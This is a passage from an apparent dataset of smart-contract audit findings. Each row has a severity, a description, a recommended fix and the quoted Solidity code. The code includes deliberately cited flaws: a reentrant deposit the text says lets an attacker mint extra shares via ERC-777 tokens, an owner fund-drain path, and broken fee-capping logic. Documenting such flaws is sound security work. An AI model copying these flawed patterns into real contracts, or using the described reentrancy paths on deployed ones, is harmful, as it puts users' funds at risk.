34c6b355795027d27ae6add7360e61eb6b01b91b.\\nThe best solution would be to cap `__totalReward` first and then calculate fees from the capped value.,,"```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n uint256 \\_\\_totalReward = Transfers.\\_getBalance(rewardToken);\\n (uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n Transfers.\\_pushFunds(rewardToken, buyback, \\_feeReward);\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n \\_totalReward = \\_capTransferAmount(rewardToken, \\_totalReward, \\_retainedReward);\\n 
Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n \\_totalRouting = \\_capTransferAmount(routingToken, \\_totalRouting, \\_retainedReward);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n \\_totalBalance = \\_capTransferAmount(reserveToken, \\_totalBalance, \\_retainedReward);\\n require(\\_totalBalance >= \\_minRewardAmount, ""high slippage"");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n" +The _capFeeAmount function is not working as intended,medium,"Panther token has a limit on the transfer size. Because of that, all the Panther transfer values in the `PantherSwapCompoundingStrategyToken` are also capped beforehand. The following function is called to cap the size of fees:\\n```\\nfunction \\_capFeeAmount(uint256 \\_amount) internal view returns (uint256 \\_capped, uint256 \\_retained)\\n{\\n \\_retained = 0;\\n uint256 \\_limit = \\_calcMaxRewardTransferAmount();\\n if (\\_amount > \\_limit) {\\n \\_amount = \\_limit;\\n \\_retained = \\_amount.sub(\\_limit);\\n }\\n return (\\_amount, \\_retained);\\n}\\n```\\n\\nThis function should return the capped amount and the amount of retained tokens. 
But because the `_amount` is changed before calculating the `_retained`, the retained amount will always be 0.",Calculate the `retained` value before changing the `amount`.,,"```\\nfunction \\_capFeeAmount(uint256 \\_amount) internal view returns (uint256 \\_capped, uint256 \\_retained)\\n{\\n \\_retained = 0;\\n uint256 \\_limit = \\_calcMaxRewardTransferAmount();\\n if (\\_amount > \\_limit) {\\n \\_amount = \\_limit;\\n \\_retained = \\_amount.sub(\\_limit);\\n }\\n return (\\_amount, \\_retained);\\n}\\n```\\n" +Stale split ratios in UniversalBuyback,medium,"The `gulp` and `pendingBurning` functions of the `UniversalBuyback` contract use the hardcoded, constant values of `DEFAULT_REWARD_BUYBACK1_SHARE` and `DEFAULT_REWARD_BUYBACK2_SHARE` to determine the ratio the trade value is split with.\\nConsequently, any call to `setRewardSplit` to set a new ratio will be ineffective but still result in a `ChangeRewardSplit` event being emitted. This event can deceive system operators and users as it does not reflect the correct values of the contract.\\n```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n\\n```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n","Instead of the default values, `rewardBuyback1Share` and `rewardBuyback2Share` should be used.",,```\\nuint256 \\_amount1 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK1\\_SHARE) / 1e18;\\nuint256 \\_amount2 = \\_balance.mul(DEFAULT\\_REWARD\\_BUYBACK2\\_SHARE) / 1e18;\\n```\\n +Exchange owner might steal users' funds using reentrancy,medium,"The practice of pulling funds from a user (by using safeTransferFrom) and then later pushing (some) of the funds back to the user occurs in various places in the `Exchange` contract. 
In case one of the used token contracts (or one of its dependent calls) externally calls the `Exchange` owner, the owner may utilize that to call back `Exchange.recoverLostFunds` and drain (some) user funds.\\n```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n\\n```\\nfunction joinPoolFromInput(address \\_pool, address \\_token, uint256 \\_inputAmount, uint256 \\_minOutputShares) external override returns (uint256 \\_outputShares)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_token, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_token)); // deals with potential transfer tax\\n \\_outputShares = UniswapV2LiquidityPoolAbstraction.\\_joinPoolFromInput(router, \\_pool, \\_token, \\_inputAmount, \\_minOutputShares);\\n \\_outputShares = Math.\\_min(\\_outputShares, Transfers.\\_getBalance(\\_pool)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_pool, \\_sender, \\_outputShares);\\n return \\_outputShares;\\n}\\n```\\n\\n```\\nfunction convertFundsFromOutput(address \\_from, address \\_to, uint256 \\_outputAmount, uint256 \\_maxInputAmount) external override returns (uint256 \\_inputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, 
\\_maxInputAmount);\\n \\_maxInputAmount = Math.\\_min(\\_maxInputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_inputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromOutput(router, \\_from, \\_to, \\_outputAmount, \\_maxInputAmount);\\n uint256 \\_refundAmount = \\_maxInputAmount - \\_inputAmount;\\n \\_refundAmount = Math.\\_min(\\_refundAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_from, \\_sender, \\_refundAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_inputAmount;\\n}\\n```\\n\\n```\\nfunction recoverLostFunds(address \\_token) external onlyOwner\\n{\\n uint256 \\_balance = Transfers.\\_getBalance(\\_token);\\n Transfers.\\_pushFunds(\\_token, treasury, \\_balance);\\n}\\n```\\n","Reentrancy guard protection should be added to `Exchange.convertFundsFromInput`, `Exchange.convertFundsFromOutput`, `Exchange.joinPoolFromInput`, `Exchange.recoverLostFunds` at least, and in general to all public/external functions since gas price considerations are less relevant for contracts deployed on BSC.",,"```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return 
\\_outputAmount;\\n}\\n```\\n" +Exchange owner might steal users' funds using reentrancy,medium,"The practice of pulling funds from a user (by using safeTransferFrom) and then later pushing (some) of the funds back to the user occurs in various places in the `Exchange` contract. In case one of the used token contracts (or one of its dependent calls) externally calls the `Exchange` owner, the owner may utilize that to call back `Exchange.recoverLostFunds` and drain (some) user funds.\\n```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n\\n```\\nfunction joinPoolFromInput(address \\_pool, address \\_token, uint256 \\_inputAmount, uint256 \\_minOutputShares) external override returns (uint256 \\_outputShares)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_token, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_token)); // deals with potential transfer tax\\n \\_outputShares = UniswapV2LiquidityPoolAbstraction.\\_joinPoolFromInput(router, \\_pool, \\_token, \\_inputAmount, \\_minOutputShares);\\n \\_outputShares = Math.\\_min(\\_outputShares, Transfers.\\_getBalance(\\_pool)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_pool, \\_sender, \\_outputShares);\\n return 
\\_outputShares;\\n}\\n```\\n\\n```\\nfunction convertFundsFromOutput(address \\_from, address \\_to, uint256 \\_outputAmount, uint256 \\_maxInputAmount) external override returns (uint256 \\_inputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_maxInputAmount);\\n \\_maxInputAmount = Math.\\_min(\\_maxInputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_inputAmount = UniswapV2ExchangeAbstraction.\\_convertFundsFromOutput(router, \\_from, \\_to, \\_outputAmount, \\_maxInputAmount);\\n uint256 \\_refundAmount = \\_maxInputAmount - \\_inputAmount;\\n \\_refundAmount = Math.\\_min(\\_refundAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_from, \\_sender, \\_refundAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_inputAmount;\\n}\\n```\\n\\n```\\nfunction recoverLostFunds(address \\_token) external onlyOwner\\n{\\n uint256 \\_balance = Transfers.\\_getBalance(\\_token);\\n Transfers.\\_pushFunds(\\_token, treasury, \\_balance);\\n}\\n```\\n","Reentrancy guard protection should be added to `Exchange.convertFundsFromInput`, `Exchange.convertFundsFromOutput`, `Exchange.joinPoolFromInput`, `Exchange.recoverLostFunds` at least, and in general to all public/external functions since gas price considerations are less relevant for contracts deployed on BSC.",,"```\\nfunction convertFundsFromInput(address \\_from, address \\_to, uint256 \\_inputAmount, uint256 \\_minOutputAmount) external override returns (uint256 \\_outputAmount)\\n{\\n address \\_sender = msg.sender;\\n Transfers.\\_pullFunds(\\_from, \\_sender, \\_inputAmount);\\n \\_inputAmount = Math.\\_min(\\_inputAmount, Transfers.\\_getBalance(\\_from)); // deals with potential transfer tax\\n \\_outputAmount = 
UniswapV2ExchangeAbstraction.\\_convertFundsFromInput(router, \\_from, \\_to, \\_inputAmount, \\_minOutputAmount);\\n \\_outputAmount = Math.\\_min(\\_outputAmount, Transfers.\\_getBalance(\\_to)); // deals with potential transfer tax\\n Transfers.\\_pushFunds(\\_to, \\_sender, \\_outputAmount);\\n return \\_outputAmount;\\n}\\n```\\n" +Yearn: Re-entrancy attack during deposit,high,"During the deposit in the `supplyTokenTo` function, the token transfer is happening after the shares are minted and before tokens are deposited to the yearn vault:\\n```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n\\nIf the token allows the re-entrancy (e.g., ERC-777), the attacker can do one more transaction during the token transfer and call the `supplyTokenTo` function again. This second call will be done with already modified shares from the first deposit but non-modified token balances. That will lead to an increased amount of shares minted during the `supplyTokenTo`. 
By using that technique, it's possible to steal funds from other users of the contract.",Have the re-entrancy guard on all the external functions.,,"```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n" +Yearn: Partial deposits are not processed properly,high,"The deposit is usually made with all the token balance of the contract:\\n```\\n// this will deposit full balance (for cases like not enough room in Vault)\\nreturn v.deposit();\\n```\\n\\nThe Yearn vault contract has a limit of how many tokens can be deposited there. If the deposit hits the limit, only part of the tokens is deposited (not to exceed the limit). That case is not handled properly, the shares are minted as if all the tokens are accepted, and the “change” is not transferred back to the caller:\\n```\\nfunction supplyTokenTo(uint256 \\_amount, address to) override external {\\n uint256 shares = \\_tokenToShares(\\_amount);\\n\\n \\_mint(to, shares);\\n\\n // NOTE: we have to deposit after calculating shares to mint\\n token.safeTransferFrom(msg.sender, address(this), \\_amount);\\n\\n \\_depositInVault();\\n\\n emit SuppliedTokenTo(msg.sender, shares, \\_amount, to);\\n}\\n```\\n",Handle the edge cases properly.,,```\\n// this will deposit full balance (for cases like not enough room in Vault)\\nreturn v.deposit();\\n```\\n +Sushi: redeemToken redeems less than it should,medium,"The `redeemToken` function takes as argument the amount of SUSHI to redeem. 
Because the SushiBar's `leave` function - which has to be called to achieve this goal - takes an amount of xSUSHI that is to be burned in exchange for SUSHI, `redeemToken` has to compute the amount of xSUSHI that will result in a return of as many SUSHI tokens as were requested.\\n```\\n/// @notice Redeems tokens from the yield source from the msg.sender, it burn yield bearing tokens and return token to the sender.\\n/// @param amount The amount of `token()` to withdraw. Denominated in `token()` as above.\\n/// @return The actual amount of tokens that were redeemed.\\nfunction redeemToken(uint256 amount) public override returns (uint256) {\\n ISushiBar bar = ISushiBar(sushiBar);\\n ISushi sushi = ISushi(sushiAddr);\\n\\n uint256 totalShares = bar.totalSupply();\\n uint256 barSushiBalance = sushi.balanceOf(address(bar));\\n uint256 requiredShares = amount.mul(totalShares).div(barSushiBalance);\\n\\n uint256 barBeforeBalance = bar.balanceOf(address(this));\\n uint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\n bar.leave(requiredShares);\\n\\n uint256 barAfterBalance = bar.balanceOf(address(this));\\n uint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\n uint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\n uint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\n balances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n sushi.transfer(msg.sender, sushiBalanceDiff);\\n return (sushiBalanceDiff);\\n}\\n```\\n\\nBecause the necessary calculations involve division and amounts have to be integral values, it is usually not possible to get the exact amount of SUSHI tokens that were requested. More precisely, let `a` denote the total supply of xSUSHI and `b` the SushiBar's balance of SUSHI at `a` certain point in time. If the SushiBar's `leave` function is supplied with `x` xSUSHI, then it will transfer floor(x * `b` / a) SUSHI. 
(We assume throughout this discussion that the numbers involved are small enough such that no overflow occurs and that `a` and `b` are not zero.)\\nHence, if `y` is the amount of SUSHI requested, it would make sense to call `leave` with the biggest number `x` that satisfies floor(x * b / a) <= `y` or the smallest number `x` that satisfies `floor(x * b / a) >= y`. Which of the two is “better” or “correct” needs to be specified, based on the requirements of the caller of `redeemToken`. It seems plausible, though, that the first variant is the one that makes more sense in this context, and the current implementation of `redeemToken` supports this hypothesis. It calls `leave` with `x1 := floor(y * a / b)`, which gives us floor(x1 * b / a) <= `y`. However, `x1` is not necessarily the biggest number that satisfies the relation, so the caller of `redeemToken` might end up with less SUSHI than they could have gotten while still not exceeding `y`.\\nThe correct amount to call `leave` with isx2 := floor((y * a + a - 1) / b) = max { x | floor(x * b / a) <= y }. Since `|x2 - x1| <= 1`, the difference in SUSHI is at most `floor(b / a)`. Nevertheless, even this small difference might subvert fairly reasonable expectations. For example, if someone queries `balanceOfToken` and immediately after that feeds the result into `redeemToken`, they might very well expect to redeem exactly the given amount and not less; it's their current balance, after all. However, that's not always the case with the current implementation.",Calculate `requiredShares` based on the formula above (x2). We also recommend dealing in a clean way with the special cases `totalShares == 0` and `barSushiBalance == 0`.,,"```\\n/// @notice Redeems tokens from the yield source from the msg.sender, it burn yield bearing tokens and return token to the sender.\\n/// @param amount The amount of `token()` to withdraw. 
Denominated in `token()` as above.\\n/// @return The actual amount of tokens that were redeemed.\\nfunction redeemToken(uint256 amount) public override returns (uint256) {\\n ISushiBar bar = ISushiBar(sushiBar);\\n ISushi sushi = ISushi(sushiAddr);\\n\\n uint256 totalShares = bar.totalSupply();\\n uint256 barSushiBalance = sushi.balanceOf(address(bar));\\n uint256 requiredShares = amount.mul(totalShares).div(barSushiBalance);\\n\\n uint256 barBeforeBalance = bar.balanceOf(address(this));\\n uint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\n bar.leave(requiredShares);\\n\\n uint256 barAfterBalance = bar.balanceOf(address(this));\\n uint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\n uint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\n uint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\n balances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n sushi.transfer(msg.sender, sushiBalanceDiff);\\n return (sushiBalanceDiff);\\n}\\n```\\n" +Sushi: balanceOfToken underestimates balance,medium,"The `balanceOfToken` computation is too pessimistic, i.e., it can underestimate the current balance slightly.\\n```\\n/// @notice Returns the total balance (in asset tokens). 
This includes the deposits and interest.\\n/// @return The underlying balance of asset tokens\\nfunction balanceOfToken(address addr) public override returns (uint256) {\\n if (balances[addr] == 0) return 0;\\n ISushiBar bar = ISushiBar(sushiBar);\\n\\n uint256 shares = bar.balanceOf(address(this));\\n uint256 totalShares = bar.totalSupply();\\n\\n uint256 sushiBalance =\\n shares.mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(\\n totalShares\\n );\\n uint256 sourceShares = bar.balanceOf(address(this));\\n\\n return (balances[addr].mul(sushiBalance).div(sourceShares));\\n}\\n```\\n\\nFirst, it calculates the amount of SUSHI that “belongs to” the yield source contract (sushiBalance), and then it determines the fraction of that amount that would be owed to the address in question. However, the “belongs to” above is a purely theoretical concept; it never happens that the yield source contract as a whole redeems and then distributes that amount among its shareholders; instead, if a shareholder redeems tokens, their request is passed through to the `SushiBar`. So in reality, there's no reason for this two-step process, and the holder's balance of SUSHI is more accurately computed as `balances[addr].mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(totalShares)`, which can be greater than what `balanceOfToken` currently returns. Note that this is the amount of SUSHI that `addr` could withdraw directly from the `SushiBar`, based on their amount of shares. Observe also that if we sum these numbers up over all holders in the yield source contract, the result is smaller than or equal to `sushiBalance`. So the sum still doesn't exceed what “belongs to” the yield source contract.",The `balanceOfToken` function should use the formula above.,,```\\n/// @notice Returns the total balance (in asset tokens). 
This includes the deposits and interest.\\n/// @return The underlying balance of asset tokens\\nfunction balanceOfToken(address addr) public override returns (uint256) {\\n if (balances[addr] == 0) return 0;\\n ISushiBar bar = ISushiBar(sushiBar);\\n\\n uint256 shares = bar.balanceOf(address(this));\\n uint256 totalShares = bar.totalSupply();\\n\\n uint256 sushiBalance =\\n shares.mul(ISushi(sushiAddr).balanceOf(address(sushiBar))).div(\\n totalShares\\n );\\n uint256 sourceShares = bar.balanceOf(address(this));\\n\\n return (balances[addr].mul(sushiBalance).div(sourceShares));\\n}\\n```\\n +Yearn: Redundant approve call,low,"The approval for token transfer is done in the following way:\\n```\\nif(token.allowance(address(this), address(v)) < token.balanceOf(address(this))) {\\n token.safeApprove(address(v), 0);\\n token.safeApprove(address(v), type(uint256).max);\\n}\\n```\\n\\nSince the approval will be equal to the maximum value, there's no need to make zero-value approval first.",Change two `safeApprove` to one regular `approve` with the maximum value.,,"```\\nif(token.allowance(address(this), address(v)) < token.balanceOf(address(this))) {\\n token.safeApprove(address(v), 0);\\n token.safeApprove(address(v), type(uint256).max);\\n}\\n```\\n" +Sushi: Some state variables should be immutable and have more specific types,low,"The state variables `sushiBar` and `sushiAddr` are initialized in the contract's constructor and never changed afterward.\\n```\\ncontract SushiYieldSource is IYieldSource {\\n using SafeMath for uint256;\\n address public sushiBar;\\n address public sushiAddr;\\n mapping(address => uint256) public balances;\\n\\n constructor(address \\_sushiBar, address \\_sushiAddr) public {\\n sushiBar = \\_sushiBar;\\n sushiAddr = \\_sushiAddr;\\n }\\n```\\n\\nThey should be immutable; that would save some gas and make it clear that they won't (and can't) be changed once the contract has been deployed.\\nMoreover, they would better have more specific 
interface types than `address`, i.e., `ISushiBar` for `sushiBar` and `ISushi` for `sushiAddr`. That would be safer and make the code more readable.","Make these two state variables `immutable` and change their types as indicated above. Remove the corresponding explicit type conversions in the rest of the contract, and add explicit conversions to type `address` where necessary.",,"```\\ncontract SushiYieldSource is IYieldSource {\\n using SafeMath for uint256;\\n address public sushiBar;\\n address public sushiAddr;\\n mapping(address => uint256) public balances;\\n\\n constructor(address \\_sushiBar, address \\_sushiAddr) public {\\n sushiBar = \\_sushiBar;\\n sushiAddr = \\_sushiAddr;\\n }\\n```\\n" +Sushi: Unnecessary balance queries,low,"In function `redeemToken`, `barBalanceDiff` is always the same as `requiredShares` because the SushiBar's `leave` function burns exactly `requiredShares` xSUSHI.\\n```\\nuint256 barBeforeBalance = bar.balanceOf(address(this));\\nuint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\nbar.leave(requiredShares);\\n\\nuint256 barAfterBalance = bar.balanceOf(address(this));\\nuint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\nuint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\nuint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\nbalances[msg.sender] = balances[msg.sender].sub(barBalanceDiff);\\n```\\n","Use `requiredShares` instead of `barBalanceDiff`, and remove the unnecessary queries and variables.",,```\\nuint256 barBeforeBalance = bar.balanceOf(address(this));\\nuint256 sushiBeforeBalance = sushi.balanceOf(address(this));\\n\\nbar.leave(requiredShares);\\n\\nuint256 barAfterBalance = bar.balanceOf(address(this));\\nuint256 sushiAfterBalance = sushi.balanceOf(address(this));\\n\\nuint256 barBalanceDiff = barBeforeBalance.sub(barAfterBalance);\\nuint256 sushiBalanceDiff = sushiAfterBalance.sub(sushiBeforeBalance);\\n\\nbalances[msg.sender] = 
balances[msg.sender].sub(barBalanceDiff);\\n```\\n +Sushi: Unnecessary function declaration in interface,low,"The `ISushiBar` interface declares a `transfer` function.\\n```\\ninterface ISushiBar {\\n function enter(uint256 \\_amount) external;\\n\\n function leave(uint256 \\_share) external;\\n\\n function totalSupply() external view returns (uint256);\\n\\n function balanceOf(address account) external view returns (uint256);\\n\\n function transfer(address recipient, uint256 amount)\\n external\\n returns (bool);\\n}\\n```\\n\\nHowever, this function is never used, so it could be removed from the interface. Other functions that the `SushiBar` provides but are not used (approve, for example) aren't part of the interface either.",Remove the `transfer` declaration from the `ISushiBar` interface.,,"```\\ninterface ISushiBar {\\n function enter(uint256 \\_amount) external;\\n\\n function leave(uint256 \\_share) external;\\n\\n function totalSupply() external view returns (uint256);\\n\\n function balanceOf(address account) external view returns (uint256);\\n\\n function transfer(address recipient, uint256 amount)\\n external\\n returns (bool);\\n}\\n```\\n" +Simplify the harvest method in each SinglePlus,low,"The `BadgerSBTCCrvPlus` single plus contract implements a custom `harvest` method.\\n```\\n/\\*\\*\\n \\* @dev Harvest additional yield from the investment.\\n \\* Only governance or strategist can call this function.\\n \\*/\\nfunction harvest(address[] calldata \\_tokens, uint256[] calldata \\_cumulativeAmounts, uint256 \\_index, uint256 \\_cycle,\\n```\\n\\nThis method can only be called by the strategist because of the `onlyStrategist` modifier.\\nThis method has a few steps which take one asset and transform it into another asset a few times.\\nIt first claims the Badger tokens:\\n```\\n// 1. 
Harvest from Badger Tree\\nIBadgerTree(BADGER\\_TREE).claim(\\_tokens, \\_cumulativeAmounts, \\_index, \\_cycle, \\_merkleProof, \\_amountsToClaim);\\n```\\n\\nThen it transforms the Badger tokens into WBTC using Uniswap.\\n```\\n// 2. Sushi: Badger --> WBTC\\nuint256 \\_badger = IERC20Upgradeable(BADGER).balanceOf(address(this));\\nif (\\_badger > 0) {\\n IERC20Upgradeable(BADGER).safeApprove(SUSHISWAP, 0);\\n IERC20Upgradeable(BADGER).safeApprove(SUSHISWAP, \\_badger);\\n\\n address[] memory \\_path = new address[](2);\\n \\_path[0] = BADGER;\\n \\_path[1] = WBTC;\\n\\n IUniswapRouter(SUSHISWAP).swapExactTokensForTokens(\\_badger, uint256(0), \\_path, address(this), block.timestamp.add(1800));\\n}\\n```\\n\\nThis step can be simplified in two ways.\\nFirst, the `safeApprove` method isn't useful because its usage is not recommended anymore.\\nThe OpenZeppelin version 4 implementation states the method is deprecated and its usage is discouraged.\\n```\\n\\* @dev Deprecated. This function has issues similar to the ones found in\\n\\* {IERC20-approve}, and its usage is discouraged.\\n```\\n\\n```\\n \\* @dev Deprecated. This function has issues similar to the ones found in\\n \\* {IERC20-approve}, and its usage is discouraged.\\n```\\n\\nAnother step is swapping the tokens on Uniswap.\\n```\\nIUniswapRouter(SUSHISWAP).swapExactTokensForTokens(\\_badger, uint256(0), \\_path, address(this), block.timestamp.add(1800));\\n```\\n\\nIn this case, the last argument `block.timestamp.add(1800)` is the deadline. This is useful when the transaction is sent to the network and a deadline is needed to expire the transaction. 
However, the execution is right now and there's no need for a future expiration date.\\nRemoving the safe math addition will have the same end effect, the tokens will be swapped and the call is not at risk to expire.",Resolution\\nComment from NUTS Finance team:\\nWe have replaced all safeApprove() usage with approve() and used block.timestamp as the expiration date.\\nDo not use safe math when sending the expiration date. Use `block.timestamp` for the same effect and a reduced gas cost.\\nApply the same principles for other Single Plus Tokens.,,"```\\n/\\*\\*\\n \\* @dev Harvest additional yield from the investment.\\n \\* Only governance or strategist can call this function.\\n \\*/\\nfunction harvest(address[] calldata \\_tokens, uint256[] calldata \\_cumulativeAmounts, uint256 \\_index, uint256 \\_cycle,\\n```\\n" +Reduce complexity in modifiers related to governance and strategist,low,"The modifier onlyGovernance:\\n```\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n\\nCalls the internal function _checkGovernance:\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == governance, ""not governance"");\\n}\\n```\\n\\nThere is no other case where the internal method `_checkGovernance` is called directly.\\nOne can reduce complexity by removing the internal function and moving its code directly in the modifier. 
This will increase code size but reduce gas used and code complexity.\\nThere are multiple similar instances:\\n```\\nfunction \\_checkStrategist() internal view {\\n require(msg.sender == governance || strategists[msg.sender], ""not strategist"");\\n}\\n\\nmodifier onlyStrategist {\\n \\_checkStrategist();\\n \\_;\\n}\\n```\\n\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == governance, ""not governance"");\\n}\\n\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == IGaugeController(controller).governance(), ""not governance"");\\n}\\n\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n",Consider removing the internal function and including its body in the modifier directly if the code size is not an issue.,,```\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n +zAuction - incomplete / dead code zWithdraw and zDeposit,high,"The code generally does not appear to be production-ready. The methods `zWithdraw` and `zDeposit` do not appear to be properly implemented. `zWithdraw` rather burns `ETH` balance than withdrawing it for an account (missing transfer) and `zDeposit` manipulates an accounts balance but never receives the `ETH` amount it credits to an account.\\n```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n```\\n",Resolution\\nobsolete with changes from zer0-os/[email protected]135b2aa removing the `zAccountAccountant`.\\nThe methods do not seem to be used by the zAuction contract. It is highly discouraged from shipping incomplete implementations in productive code. 
